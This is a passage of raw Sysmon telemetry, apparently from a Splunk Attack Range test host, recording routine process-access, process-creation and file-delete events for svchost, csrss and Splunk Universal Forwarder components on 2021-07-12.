08:06:25.548{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810127Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:25.548{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810126Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:25.548{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810125Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:25.548{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810124Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:25.548{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810123Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:25.548{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810122Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:25.548{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810121Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:25.548{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810120Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:25.548{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810119Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:25.548{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F801-60EB-D779-00000000D001}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810118Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:25.548{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F801-60EB-D779-00000000D001}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810117Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:25.533{0C1E0330-F801-60EB-D779-00000000D001}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810116Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:25.516{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D0D89CBF506CB439219E8F32451D302F,SHA256=D1824C29E002FE360C73B70AFC3610E7134496CB1E5986FD374B4505895BE940,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810115Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:25.516{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AA17D342B34E15C67877BF30895DBC19,SHA256=CC1F4D49567C5F372DA16B200686AEB0355CBA15BA89535D8C06BB5F967BD597,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054246Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:26.671{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8DBC4D7C633C1B6639FD47926FF1CE4,SHA256=02C9BEF0C9934FBDF85B6425B11ADE745D099447A1222DB20E42AE950AD219CE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810157Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.923{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F802-60EB-D979-00000000D001}2896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810156Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.923{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810155Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.923{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810154Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.923{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810153Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.923{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810152Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.923{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810151Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.923{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810150Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.923{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810149Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.923{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810148Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.923{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810147Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.923{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F802-60EB-D979-00000000D001}2896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810146Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.923{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F802-60EB-D979-00000000D001}2896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810145Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.908{0C1E0330-F802-60EB-D979-00000000D001}2896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 